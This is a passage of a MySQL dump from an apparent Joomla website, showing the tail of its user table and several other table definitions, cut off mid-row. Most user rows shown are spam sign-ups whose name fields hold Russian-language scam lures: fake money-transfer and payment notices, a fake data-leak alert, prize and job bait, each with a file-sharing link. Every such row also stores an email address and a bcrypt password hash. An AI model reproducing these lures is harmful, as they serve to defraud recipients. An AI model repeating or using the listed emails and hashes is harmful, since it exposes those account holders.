http://https://drive.google.com/open?id=1xen1d12gZttl7tKw7KjBMsw3HCufBqI3','ebcar6longmend','pu62kk@gmail.com','$2y$10$wUO7oxWH.2y3YbGJ5bA1Mu4I9kyIBYBLrWQv3iy4YykFkpTW2aqV.',1,0,'2018-02-08 08:11:21','0000-00-00 00:00:00','5abdb9ffd7dedbeabe84b6361a333837','{}','0000-00-00 00:00:00',0,'',''),(379,'sinellik, НА ВАШ КОШЕЛЕК *2139 ПОСТУПИЛ ПЕРЕВОД СО СЧЕТА *3247 - http://https://drive.google.com/open?id=10J5kmJxLkXYLY785VML_IHIuPXw9-yHa','rhodling67micdai','sinellik@gmail.com','$2y$10$GvdBIXqIGtl8.M5TYZMcmuafank6gHEOIWA9Z22zZ4.mjZuKE.uV6',1,0,'2018-02-08 08:13:57','0000-00-00 00:00:00','8856d67535941611426ad439fb432f92','{}','0000-00-00 00:00:00',0,'',''),(380,'rassochi, Посмотрите это предложение. Формировали под все Ваши запросы. - http://https://drive.google.com/open?id=1bJg3TR0qT5NIpEL4l7jvulWyvkoDwKjV','dramso32sponkab','rassochi@gmail.com','$2y$10$r9XMvj4y59jfghB1JjXHLuKAWSzH6VglJc1jg9ca9XDWNpOrD5edm',1,0,'2018-02-08 08:15:10','0000-00-00 00:00:00','ba644ec83e0735ae7dcbdc70b55b6bf9','{}','0000-00-00 00:00:00',0,'',''),(381,'fedmaya, Распорядитесь своей удачей или она уйдет к другим! - http://https://drive.google.com/open?id=1gXRVNnhA-5J2ZWMjgI6XXuNP1lFPCdig','gumtu60highlac','fedmaya@gmail.com','$2y$10$ewSy4OFi1vTSgqZwYpCX5OmDHalxHYGEZhS8gGvEkYpgGpaQRVWYW',1,0,'2018-02-08 08:18:25','0000-00-00 00:00:00','097bec42ad4885e520f0074024a6ba4a','{}','0000-00-00 00:00:00',0,'',''),(382,'olchenx, Произошла утечка личной информации. Касается Ваших доходов. - http://https://drive.google.com/open?id=1uq6KJZioDaa85t6Qy-QTrJcpRCX_INf6','celnu23enab','olchenx@gmail.com','$2y$10$rYsUr0fQ7GvXUcHvxB4HJ.a61iZaKvG5ZwZWymOlIyLKIHrm.tM6y',1,0,'2018-02-08 08:19:42','0000-00-00 00:00:00','e53e17ebd0ba7caaeface21214167ad7','{}','0000-00-00 00:00:00',0,'',''),(383,'gadzher, Уведомление о зачислении платежа #6562973 - http://https://drive.google.com/open?id=19ZzhFRxwLaSypBo95-dh9qZdO7N3RsTf','beaubol14exdi','gadzher@gmail.com','$2y$10$FoLPAStFfGpk/JVjzheAFeqFoO6/5OqYFEBMWEg3dY60OGabbeDkC',1,0,'2018-02-08 08:21:17','0000-00-00 00:00:00','b2f93c032fa7e27fc7fadf7510538775','{}','0000-00-00 00:00:00',0,'',''),(384,'ghenusik, Нельзя брать дeньги, которые лежат на дороге! - http://68.https://drive.google.com/open?id=1xen1d12gZttl7tKw7KjBMsw3HCufBqI3','elid17zfesla','ghenusik@gmail.com','$2y$10$NCkSNZbnukuaIXEIZzw4aumZprqrkqSvHiOdwmkdwqwSCZLdfQNIG',1,0,'2018-02-08 08:22:58','0000-00-00 00:00:00','cae58677774537c4c5a2c59b17835488','{}','0000-00-00 00:00:00',0,'',''),(385,'melkiy2009000, У Вас на остатке бонусного счета 3 420 Р.. - http://https://drive.google.com/open?id=1pB7ArzNXfKk4glp5t59yRFqP_CfeDy7i','lihy93plicpal','melkiy2009000@gmail.com','$2y$10$fzpTm7qCobimxndXkfm7guO2MW/7c98mGsDJmQsqdJ47WJJL.Q/c6',1,0,'2018-02-08 08:32:49','0000-00-00 00:00:00','96e1c8169bc599ff325c1f93b29ca430','{}','0000-00-00 00:00:00',0,'',''),(386,'alnklvl, Прощайтесь со своей спокойной жизнью без истерик. - http://i6l.https://drive.google.com/open?id=1v9a2bX0AHcbetov3VZsaj-qe_Q93eqWO','apnres2anel','alnklvl@gmail.com','$2y$10$hpruWyDRu2eWf3DNTXOPK.neRD/oBuYecLm6PXydqrijr1XRWr8yK',1,0,'2018-02-08 08:35:43','0000-00-00 00:00:00','d37b80c647c84dd0cd4b4c266d27dd0c','{}','0000-00-00 00:00:00',0,'',''),(387,'bear.brownie, Осталось несколько дней действия вашего аккаунта - http://https://drive.google.com/open?id=10UeWveXwTKz-Udiv7oOfJF6Dl5mGW_Kx','waiblech77freaksom','bear.brownie@gmail.com','$2y$10$L8RQ0SCacf/u.D3RxN5A6.SP2tG.cNwjOTqKFDpnIjdINKddWXOM6',1,0,'2018-02-08 08:59:38','0000-00-00 00:00:00','ddd15cea7cbc025abc122123804ddd1f','{}','0000-00-00 00:00:00',0,'',''),(388,'turnikmen007, Нажали кнопку – пoлyчите средства. Вот как тeпeрь можно - http://tgc.https://drive.google.com/open?id=11GDCHOBj9KkUTN21BeRd8oqtkeuA3KvI','haithe20meri','turnikmen007@gmail.com','$2y$10$ZeAe.CwTA82rg/ZCuwVedeKALk.nX5Mv5GVwPFl0E3hnb/7Osz1Ri',1,0,'2018-02-08 09:04:04','0000-00-00 00:00:00','354628ffd9c851ed55767c248bc672cc','{}','0000-00-00 00:00:00',0,'',''),(389,'petrozenia, Выплата одобрена 31416.00rub. - http://yjd.https://drive.google.com/open?id=13q5HmcVrQxTJySl_YeEnb0LyyphPmep9','ketktoothf25ercas','petrozenia@gmail.com','$2y$10$6uQpb4TrUW/gUvBlxjsuf.X0Mq/nkGCGpPNgbLE1B0N.YKPeGDLZO',1,0,'2018-02-08 09:06:29','0000-00-00 00:00:00','9b001e437226203e2d14480006fc83ac','{}','0000-00-00 00:00:00',0,'',''),(390,'klevanich, ЗАКАЗ #88858 - http://98.https://drive.google.com/open?id=1ViYK0VkQ1uh8FjIgF4T9Fj31nn2jXZ9Q','pampbook77bioprom','klevanich@gmail.com','$2y$10$ixHszSX/vFCLyWNeA1H/2.BuhIFT0nv8NsDNT.m1ZGzuHo7hbA6E2',1,0,'2018-02-08 09:07:23','0000-00-00 00:00:00','9e85118912f5001fcde9a6e876838b5b','{}','0000-00-00 00:00:00',0,'',''),(391,'emperiya.n, Ваш заказ (Order ID: 37919995) - http://https://drive.google.com/open?id=1v9a2bX0AHcbetov3VZsaj-qe_Q93eqWO','salzcess44choicrys','emperiya.n@gmail.com','$2y$10$8oERqAUbqPSbGdYkQzH/i.ytZkmGLtkQJjSt5Bw081nJfZvLJJSYi',1,0,'2018-02-08 09:09:49','0000-00-00 00:00:00','8405979984105df24eb15f006066c023','{}','0000-00-00 00:00:00',0,'',''),(392,'ckdimka, НА ВАШ СЧЕТ *1037 ПОСТУПИЛ ПЕРЕВОД СО СЧЕТА *1850 - http://ndy9u0.https://drive.google.com/open?id=1UgsygjS79fwJgWuEPxh3XTH8ujQC2l6j','dickret67dismo','ckdimka@gmail.com','$2y$10$To8gWih4Lh/gVOxn.lcja.F1uk3PVyOC0wFScHYZxcR/gzD8C696G',1,0,'2018-02-08 09:23:54','0000-00-00 00:00:00','f3e1895f3fa6b18e2b17a330e4680aa4','{}','0000-00-00 00:00:00',0,'',''),(393,'ia.m.m.r.dm.i.tr.y, Скоро эти робoты заменят нам любовников. - http://03.https://drive.google.com/open?id=1t3DkkN17dT9bQlGwl_OiB_PCdawDATNe','wheelre88polfa','ia.m.m.r.dm.i.tr.y@gmail.com','$2y$10$rol2jMB9WQLvr8PY39qu7us98SPA4KHUFTaa15qgyWkOyIFxT1POC',1,0,'2018-02-08 09:49:31','0000-00-00 00:00:00','768b382cff265e5259c2c47def7a4965','{}','0000-00-00 00:00:00',0,'',''),(394,'myasnikovaira, Вам крупно повезло! - http://033943.https://drive.google.com/open?id=1_-hPpc9QQ8CAOkHEvDjnguESlDNWiDo7','tzimal6fredga','myasnikovaira@gmail.com','$2y$10$y2nBMUioxjatUdy5j/h1Wuq/BPLf0FZauG5feBwtn2avWppKvzVoa',1,0,'2018-02-08 09:52:23','0000-00-00 00:00:00','ddd1b698f0280fe54d8b0d5003edab8b','{}','0000-00-00 00:00:00',0,'',''),(395,'djlorka, ЭТО ЛИЧНОЕ ПРИГЛАШЕНИЕ #5548695 - http://75.https://drive.google.com/open?id=1M6Y7oYqSxVBS4GrHmfJN3TQIo_bZlwzp','stavol11menreau','djlorka@gmail.com','$2y$10$zcGo3w1EmDYk.ZpPObElbOYrA5WpiK3doV1eTE/xRqf5jqvyP33HS',1,0,'2018-02-08 10:01:35','0000-00-00 00:00:00','0b7bc757bf423f68394c945fa3cac14a','{}','0000-00-00 00:00:00',0,'',''),(396,'radkevicius, Сочувствую Вашим проблемам. Попробую помочь, чем смогу. - http://th2zg.https://drive.google.com/open?id=1xyNQNxsJo31HVrkxKtPeQelyVGAFiwFh','onen84chlores','radkevicius@gmail.com','$2y$10$Se6Zxn5gYB79lpNnTcqJV.nk00I0F.ImQiexEdo/yXO.houc37VF2',1,0,'2018-02-08 10:06:21','0000-00-00 00:00:00','2df627cfe6b31c961edb001180c85c43','{}','0000-00-00 00:00:00',0,'',''),(397,'anbelkov, у нас открылась вакансия именно для вас! - http://03483.https://drive.google.com/open?id=1UgsygjS79fwJgWuEPxh3XTH8ujQC2l6j','siojack84idun','anbelkov@gmail.com','$2y$10$rw2dn0oXCnHZx2u16gDNkesUURPvbce6.E8ZM5vG1HOaJonoV2BKK',1,0,'2018-02-08 10:11:17','0000-00-00 00:00:00','cb87b2ea7d74c6b8e806b906254aaf89','{}','0000-00-00 00:00:00',0,'',''),(398,'adstag, У Вас перевод от пользователя #9643 - http://https://drive.google.com/open?id=11GDCHOBj9KkUTN21BeRd8oqtkeuA3KvI','pokon50titi','adstag@gmail.com','$2y$10$h2TcR/gMZCrzfHhbtWMm/.WkK3K/bRzTGmrxBrtbLVpKcGSuwiA0.',1,0,'2018-02-08 10:16:02','0000-00-00 00:00:00','bbe9b3dd28ab89dfa39615fd1d84221b','{}','0000-00-00 00:00:00',0,'',''),(399,'dvas1175, Вам наислен платеж 54809 - http://2k.https://drive.google.com/open?id=1QIlS0ztlXS2tazT5bCOpXwu1NuaqG529','ifcul39puespot','dvas1175@gmail.com','$2y$10$X72qXgD9GgJYpK8p8SsuJupTGPdHGzs0cdP5BZVfpaxGERXHVMpOi',1,0,'2018-02-08 10:17:23','0000-00-00 00:00:00','badc45f5dddb120598718d760c064a57','{}','0000-00-00 00:00:00',0,'',''),(400,'cristineabramova, Обещают дeньги на халяву? Не верь, обманут! - http://bfym.https://drive.google.com/open?id=1t3DkkN17dT9bQlGwl_OiB_PCdawDATNe','omot2kolha','cristineabramova@gmail.com','$2y$10$8PzUeL2KTka/82xnj4pbHOomYvhSTzb2wQi1JjfJKPjcPL2o/9c.G',1,0,'2018-02-08 10:25:09','0000-00-00 00:00:00','391468b7baf64461299ef6831f44ecd6','{}','0000-00-00 00:00:00',0,'',''),(401,'psyevitaj, Сочувствую Вашим проблемам. Попробую помочь, чем смогу. - http://a7y.https://drive.google.com/open?id=1EB2io_IJX8W3ln28vcO0pug90nZa9w5c','riamag26unog','psyevitaj@gmail.com','$2y$10$P.YqDiBje3CEEQEqAvgN3un51IUmoK1iljdYB8ALSMsgMVw4zW3YG',1,0,'2018-02-08 10:30:46','0000-00-00 00:00:00','e144e8a1ce603f93085f7fd567c91b02','{}','0000-00-00 00:00:00',0,'',''),(402,'skabysh, Вам перевод от пользователя #8992 - http://4281.https://drive.google.com/open?id=1J0sQcez1yrmW-qaNoHTx8Zw3z8TYg3XO','cysra79spikjack','skabysh@gmail.com','$2y$10$I6u7YQtDof7wuSRaNQnROOic3Z26FVyD5zLVSQRu4DMDHnmedbJyS',1,0,'2018-02-08 10:35:40','0000-00-00 00:00:00','68e0894b9304dec83fdae6d61312fcda','{}','0000-00-00 00:00:00',0,'',''),(403,'drovnic, Если не спалитесь, через 4 месяца будете с квартирой. - http://e16y.https://drive.google.com/open?id=13q5HmcVrQxTJySl_YeEnb0LyyphPmep9','flagherz65boyfrac','drovnic@gmail.com','$2y$10$CoJd4okkfaDe7KBLhQ.cP.90g8kiEoBOyYWX6WlgCfzWPxaf1VN6i',1,0,'2018-02-08 10:54:54','0000-00-00 00:00:00','92f47b1e02db0e1be5fcfbb4228cec0d','{}','0000-00-00 00:00:00',0,'',''),(404,'vlad6422, Средства из будущего. К Вам уже дошли? - http://652734.https://drive.google.com/open?id=1C22axA02Qhu86uR7woftVJlNF7U-ojLT','isal61dakett','vlad6422@gmail.com','$2y$10$NQejV29S2KQFy5tMcvQmJuuEpiS1/V5FJQ/rFql3uTVT/mfNN.Hxu',1,0,'2018-02-08 11:03:21','0000-00-00 00:00:00','92b01564114080cc0db971d0e4abf9b2','{}','0000-00-00 00:00:00',0,'',''),(405,'rostiklanovoy, НАПОМИНАЕМ ВАМ, ЧТО У ВАС НА ОСТАТКЕ БОНУСНОГО СЧЕТА 3 962 Р.. - http://jz674g.https://drive.google.com/open?id=1IgCYP_wagV6_ZLC_Lu4gPpHyMRBFBiZj','rebe35enlo','rostiklanovoy@gmail.com','$2y$10$i.Q7sztOFK9a8gl/0XLzNuGSFc/nSLJX6sNAPU3nq6nF1Y7oDz3mq',1,0,'2018-02-08 11:04:48','0000-00-00 00:00:00','82ae944e64a9a0febc5c8927eef2a8a7','{}','0000-00-00 00:00:00',0,'',''),(406,'olzhabala, Посмотрите это предложение. Формировали под все Ваши запросы. - http://https://drive.google.com/open?id=10xDqcjGnoSl0A5bUWSg6x02eS0r7tI8y','busla10lanmiss','olzhabala@gmail.com','$2y$10$dUauxHyBZtvWCt0w5Owfsue.Cc0NaXKbjKluWSKwnju4g5fqSxJdy',1,0,'2018-02-08 11:06:24','0000-00-00 00:00:00','d7252ceb38c20acf17b474351f657953','{}','0000-00-00 00:00:00',0,'',''),(407,'safiullinrinat, На Ваш №6615143 счет поступили средства - http://https://drive.google.com/open?id=1n0de3x01WUuOzrYbyHihpRJhb7QFiciY','zoegoog62rere','safiullinrinat@gmail.com','$2y$10$QAKJ9cG4S6wa2bSDUrvgueLdc/.43RG.SBRSrALHNTsG0p98qVJJy',1,0,'2018-02-08 11:07:50','0000-00-00 00:00:00','3484b94d92c69158ae87c0951dc1bb81','{}','0000-00-00 00:00:00',0,'',''),(408,'eugene.minaev, Посмотрите это предложение. Формировали под все Ваши запросы. - http://https://drive.google.com/open?id=1yvloVdHrmrdt6PQgeQdmFHsEmHJying9','lanlong61galte','eugene.minaev@gmail.com','$2y$10$5tbHlC.T77gmUOA0hu2cleaG.PnhnMdG6mAzSYq/s/mtrTbNDc47K',1,0,'2018-02-08 11:41:21','0000-00-00 00:00:00','5d2ea775bd97bfdf271e0d8e5ef2f86b','{}','0000-00-00 00:00:00',0,'',''),(409,'tanyka.tanuka, Вы проходили, но не закончили регистрацию на этом проекте. Вас удалять? - http://https://drive.google.com/open?id=1RyjWmLVxRJ1FsQN3Xj-l5kaoOaR5_lzr','denmue16rosssin','tanyka.tanuka@gmail.com','$2y$10$hfp7G1AV1aOzf1mKBDO/RuTpxUKai5fQ8dn6wzbkukIck9zwRdox6',1,0,'2018-02-08 12:09:24','0000-00-00 00:00:00','4c8b68e0fd95d13183bfce665f68632b','{}','0000-00-00 00:00:00',0,'',''),(410,'tata150476, ЭТО ЛИЧНОЕ ПРИГЛАШЕНИЕ #6647317 - http://36.https://drive.google.com/open?id=1vlKcHOje_SlI4ge7YEXaqD4syxsMOBkH','saana1wellga','tata150476@gmail.com','$2y$10$uf.zraVTpUpfP3QqPdHf/.MkxY5XKV1FLsAQPj5og3X4BTkEEzDja',1,0,'2018-02-08 12:10:00','0000-00-00 00:00:00','34615b5680bfbe310f8688dd3b3cf75c','{}','0000-00-00 00:00:00',0,'',''),(411,'alexey.s.anikin, Распорядитесь своей удачей или она уйдет к другим! - http://w2uj.https://drive.google.com/open?id=19wvsPvRjwJav5Qiy8_0c2aDl6UUbs-Rg','alkon64bidpind','alexey.s.anikin@gmail.com','$2y$10$NHNP6dwiXrmJlUIrfG8Mm.NSjjetWmmez/Vq4ojckKU5gg7PkuT56',1,0,'2018-02-08 12:21:24','0000-00-00 00:00:00','9783a5de773506f33d81822776e38840','{}','0000-00-00 00:00:00',0,'',''),(412,'pro100.serz, Ваш личный счет был пополнен 20 минут назад - http://https://drive.google.com/open?id=1C22axA02Qhu86uR7woftVJlNF7U-ojLT','healre35ifjex','pro100.serz@gmail.com','$2y$10$99Jvyftyv2Dq3ctGkCqKH.7ZHAla9UzVaM1BUyk881YMK.of1RjkS',1,0,'2018-02-08 12:34:17','0000-00-00 00:00:00','6d362f6a1d814f02d69fc58b799c830a','{}','0000-00-00 00:00:00',0,'',''),(413,'alxshevtsov, Средства зачислены на ваш баланс #1564473 - http://https://drive.google.com/open?id=1yDw_UpHJO39X3UNSB-zAvDGTruqSNEHg','tacou87chandmi','alxshevtsov@gmail.com','$2y$10$.CvlQT3UyKc9ZD/Lp5OdLOCcv9MIHHlmdSN7D6AnJnowKvhyuQ3ja',1,0,'2018-02-08 12:41:56','0000-00-00 00:00:00','ce81a647dd18e22932b4b22cc335ce09','{}','0000-00-00 00:00:00',0,'',''),(414,'eralov5588, ЗА ВАШУ РАБОТУ ПОЛУЧЕНО: 14 559 руб. - http://https://drive.google.com/open?id=1pB7ArzNXfKk4glp5t59yRFqP_CfeDy7i','riage89quiknow','eralov5588@gmail.com','$2y$10$ARul5/kUYLTc4T7VMj40QOl28SJ7M6efI0/fgik823uF0TOGU.QPy',1,0,'2018-02-08 12:45:25','0000-00-00 00:00:00','71f88905ae8de3e42903574e4eefe405','{}','0000-00-00 00:00:00',0,'',''),(415,'rudenkona, Вам крупно повезло! - http://31896.https://drive.google.com/open?id=1DQ4Tdpt2lpED2neqBVgWs1hwLd_RY4da','erca91ptotqui','rudenkona@gmail.com','$2y$10$HwNnEP8MATub8JD1P4z2vuQfDjeYSwUug6kFCvBIvteNAUlapQMx2',1,0,'2018-02-08 12:58:05','0000-00-00 00:00:00','6af04f523b4f7d1717e3108eac9be6e3','{}','0000-00-00 00:00:00',0,'',''),(416,'yaroslav.polatayko, На ваш кошелек *1277 поступил перевод со счета *5059 - http://mkjm.https://drive.google.com/open?id=1p-5JrsW08KpDXtGUKthjAt2wq_j2wyQI','rioplat32lacthe','yaroslav.polatayko@gmail.com','$2y$10$oDKRIqtOhLq2fVj1eVC./OsvKe9lTUZGKAaG.80l2SvIfU5wCb9N2',1,0,'2018-02-08 13:04:07','0000-00-00 00:00:00','26abe27ea0bcf6a2c84d6732f6114306','{}','0000-00-00 00:00:00',0,'',''),(417,'natkalm, Распорядитесь своей удачей или она уйдет к другим! - http://https://drive.google.com/open?id=19wvsPvRjwJav5Qiy8_0c2aDl6UUbs-Rg','repho26rira','natkalm@gmail.com','$2y$10$hV63.oSglDnI4651QIEsveu4cWMG43hueErV7moVm6vTlhpSOo52e',1,0,'2018-02-08 13:18:44','0000-00-00 00:00:00','72f72decce5e8b04e7bcc3db1e45309a','{}','0000-00-00 00:00:00',0,'',''),(418,'megrem444, На Ваш №5273345 счет поступили средства - http://https://drive.google.com/open?id=1nGjx0sL1FmW9w3MZ1ED-Z6PjFsm6sIXN','esbu24guze','megrem444@gmail.com','$2y$10$AUaJU90zvZAIQL50e7V1We4uEH6NZEQJCVx8pYo77ABUPfHIcMh22',1,0,'2018-02-08 13:27:30','0000-00-00 00:00:00','e51b9690719718d33c81b7cf5ea89894','{}','0000-00-00 00:00:00',0,'',''),(419,'sanek777.91, Произошла утечка личной информации. Касается Ваших доходов. - http://https://drive.google.com/open?id=1_-hPpc9QQ8CAOkHEvDjnguESlDNWiDo7','reugrat5idbe','sanek777.91@gmail.com','$2y$10$d19K9D8BEXULLjgjpyiwHeHbia2UnTa.qC8EpFQX4EaRlsAMJrDva',1,0,'2018-02-08 13:48:03','0000-00-00 00:00:00','925a24a21478f4e1d6d90edcbe82783f','{}','0000-00-00 00:00:00',0,'',''),(420,'dfsmnfuj, Ваш внутренний счет был пополнен 9 минут назад - http://7208.https://drive.google.com/open?id=1ZJrR1kRuAX9RgQvtx-6q69uU-A8KcSSA','trolib71getback','dfsmnfuj@gmail.com','$2y$10$KEWXI.MEBZX2FnZvMhLs6.Yy1ekXTKt2BzzqVciNdW7k0CkZrzyCy',1,0,'2018-02-08 13:50:36','0000-00-00 00:00:00','2ef88970d678cb4054f336371d52e130','{}','0000-00-00 00:00:00',0,'',''),(421,'antony.motorin, Зaвтра Рoбот занесет Вам средства - http://o24.https://drive.google.com/open?id=1TPLnFp7hDcFq7CDNjblPhJPGXo88hQoX','quanti42plasma','antony.motorin@gmail.com','$2y$10$JKuKvSAJp5rH2tRnVRevHO0YG5LX951PeODfwaXGGrVD86PgwYReK',1,0,'2018-02-08 13:52:17','0000-00-00 00:00:00','a77e562c95167fa07e711c6658b31b8b','{}','0000-00-00 00:00:00',0,'',''),(422,'ukrainskaya, НАПОМИНАЕМ ВАМ, ЧТО У ВАС НА ОСТАТКЕ БОНУСНОГО СЧЕТА 3 116 Р.. - http://https://drive.google.com/open?id=1yLGCUU1bSFcVIccyhCSUYte9gUIFKIYL','pacsalz41ketprwan','ukrainskaya@gmail.com','$2y$10$cA8wTEULx4LlR2o6LGOZB.49NeRlf17AqYoFnHTkPOHQ9wVqQ4mOi',1,0,'2018-02-08 13:57:12','0000-00-00 00:00:00','24c0c1efcc7b1a763e851f90515adc43','{}','0000-00-00 00:00:00',0,'',''),(423,'makeevmaxx, Вас устраивают ваши зapaботки? - http://ajt.https://drive.google.com/open?id=1jxoEhuscQZA8cqt_WQdwbSjJOaeGvkya','tiseb13laver','makeevmaxx@gmail.com','$2y$10$dNMgvC.kbPSAYN5L.jURJOh.qiABDlgtz3p9oon7XcNYlGEU0z3EK',1,0,'2018-02-08 13:57:22','0000-00-00 00:00:00','560fdae6a506020151bc6d2da8ecf731','{}','0000-00-00 00:00:00',0,'',''),(424,'AcJKsqiiY q_8yzzdmu_q','sing31conf2','mioargairtioabolion@gmail.com','$2y$10$/cHCmkdBgfP2qRHEb4e7eOiWhPI4zPIG3STxZqn5NfWZJDY0PRKuK',1,0,'2018-02-09 05:55:50','0000-00-00 00:00:00','a70e8ce25fc560f1b822b6b551a7c041','{}','0000-00-00 00:00:00',0,'',''),(425,'площадь равнобедренного z_4o2xiq8_z треугольника','raa68am8','9ssp96034zch@list.ru','$2y$10$IOtYTGcVstiEPHtmU2e7sOFnNCHvQ/X1i8Mfo2J7x/42hBzG2/9bK',1,0,'2018-02-24 23:43:12','0000-00-00 00:00:00','f4e233813af7e62982e0a1372ef11947','{}','0000-00-00 00:00:00',0,'',''),(426,'z_ugtmrjo_z товаров каталог fix price','da60slim5','yw57px9@inbox.lv','$2y$10$LyPGTPUbu6hFNrDZRJYxt.2sr4GDREt/JwgTga2gDm8EXhKujHcQ6',1,0,'2018-03-12 21:55:08','0000-00-00 00:00:00','429c796289effffb3319843cd5d3d39f','{}','0000-00-00 00:00:00',0,'',''),(427,'z_oycv3fp_z в.сутеева сказки яблоко http://ssv52hk.trade','we38prof8','burovasavina88@bk.ru','$2y$10$Jxt2ANtOWwtlhvhY5YcvE.Ihjx/HO/o.j6caT4EtRHFwkAyvlOxge',1,0,'2018-03-24 17:47:31','0000-00-00 00:00:00','911952bf027a495f2f99813d9a8ee865','{}','0000-00-00 00:00:00',0,'',''),(428,'бокс z_rf5ws2o_z хранения для косметики акриловый http://ytzhzjhq.trade','pie27hard7','dorofeewaall@yandex.ua','$2y$10$0dCeNEz1Un6xKhgxcRmDfe1sE1NWSCQq.T3fzcuVrehmnUSk9HR7K',1,0,'2018-03-26 01:39:25','0000-00-00 00:00:00','028817169189458ed8d7c7f191e80d31','{}','0000-00-00 00:00:00',0,'',''); /*!40000 ALTER TABLE `jos_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_viewlevels` -- DROP TABLE IF EXISTS `jos_viewlevels`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_viewlevels` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', `title` varchar(100) NOT NULL DEFAULT '', `ordering` int(11) NOT NULL DEFAULT '0', `rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.', PRIMARY KEY (`id`), UNIQUE KEY `idx_assetgroup_title_lookup` (`title`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_viewlevels` -- LOCK TABLES `jos_viewlevels` WRITE; /*!40000 ALTER TABLE `jos_viewlevels` DISABLE KEYS */; INSERT INTO `jos_viewlevels` VALUES (1,'Public',0,'[1]'),(2,'Registered',1,'[6,2,8]'),(3,'Special',2,'[6,3,8]'); /*!40000 ALTER TABLE `jos_viewlevels` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_weblinks` -- DROP TABLE IF EXISTS `jos_weblinks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_weblinks` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `catid` int(11) NOT NULL DEFAULT '0', `title` varchar(250) NOT NULL DEFAULT '', `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `url` varchar(250) NOT NULL DEFAULT '', `description` text NOT NULL, `hits` int(11) NOT NULL DEFAULT '0', `state` tinyint(1) NOT NULL DEFAULT '0', `checked_out` int(11) NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `ordering` int(11) NOT NULL DEFAULT '0', `access` int(11) NOT NULL DEFAULT '1', `params` text NOT NULL, `language` char(7) NOT NULL DEFAULT '', `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL DEFAULT '0', `created_by_alias` varchar(255) NOT NULL DEFAULT '', `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL DEFAULT '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `metadata` text NOT NULL, `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if link is featured.', `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `version` int(10) unsigned NOT NULL DEFAULT '1', `images` text NOT NULL, PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`state`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_featured_catid` (`featured`,`catid`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_weblinks` -- LOCK TABLES `jos_weblinks` WRITE; /*!40000 ALTER TABLE `jos_weblinks` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_weblinks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_wf_profiles` -- DROP TABLE IF EXISTS `jos_wf_profiles`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_wf_profiles` ( `id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL, `description` text, `users` text NOT NULL, `types` text, `components` text NOT NULL, `area` tinyint(3) NOT NULL, `device` varchar(255) DEFAULT NULL, `rows` text NOT NULL, `plugins` text NOT NULL, `published` tinyint(3) NOT NULL, `ordering` int(11) NOT NULL, `checked_out` tinyint(3) NOT NULL, `checked_out_time` datetime NOT NULL, `params` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_wf_profiles` -- LOCK TABLES `jos_wf_profiles` WRITE; /*!40000 ALTER TABLE `jos_wf_profiles` DISABLE KEYS */; INSERT INTO `jos_wf_profiles` VALUES (1,'Default','Default Profile for all users','','6,7,3,4,5,8','',0,'desktop,tablet,phone','help,newdocument,undo,redo,spacer,bold,italic,underline,strikethrough,justifyfull,justifycenter,justifyleft,justifyright,spacer,blockquote,formatselect,styleselect,removeformat,cleanup;fontselect,fontsizeselect,forecolor,backcolor,spacer,paste,indent,outdent,numlist,bullist,sub,sup,textcase,charmap,hr;directionality,fullscreen,preview,source,print,searchreplace,spacer,table;visualaid,visualchars,nonbreaking,style,xhtmlxtras,anchor,unlink,link,imgmanager,spellchecker,article','contextmenu,browser,inlinepopups,media,help,paste,searchreplace,directionality,fullscreen,preview,source,table,textcase,print,style,nonbreaking,visualchars,xhtmlxtras,imgmanager,link,spellchecker,article',1,1,0,'0000-00-00 00:00:00','{\"editor\":{\"width\":\"\",\"height\":\"\",\"toolbar_theme\":\"default\",\"toolbar_align\":\"left\",\"toolbar_location\":\"top\",\"statusbar_location\":\"bottom\",\"path\":\"1\",\"resizing\":\"1\",\"resize_horizontal\":\"1\",\"resizing_use_cookie\":\"1\",\"toggle\":\"1\",\"toggle_label\":\"[Toggle 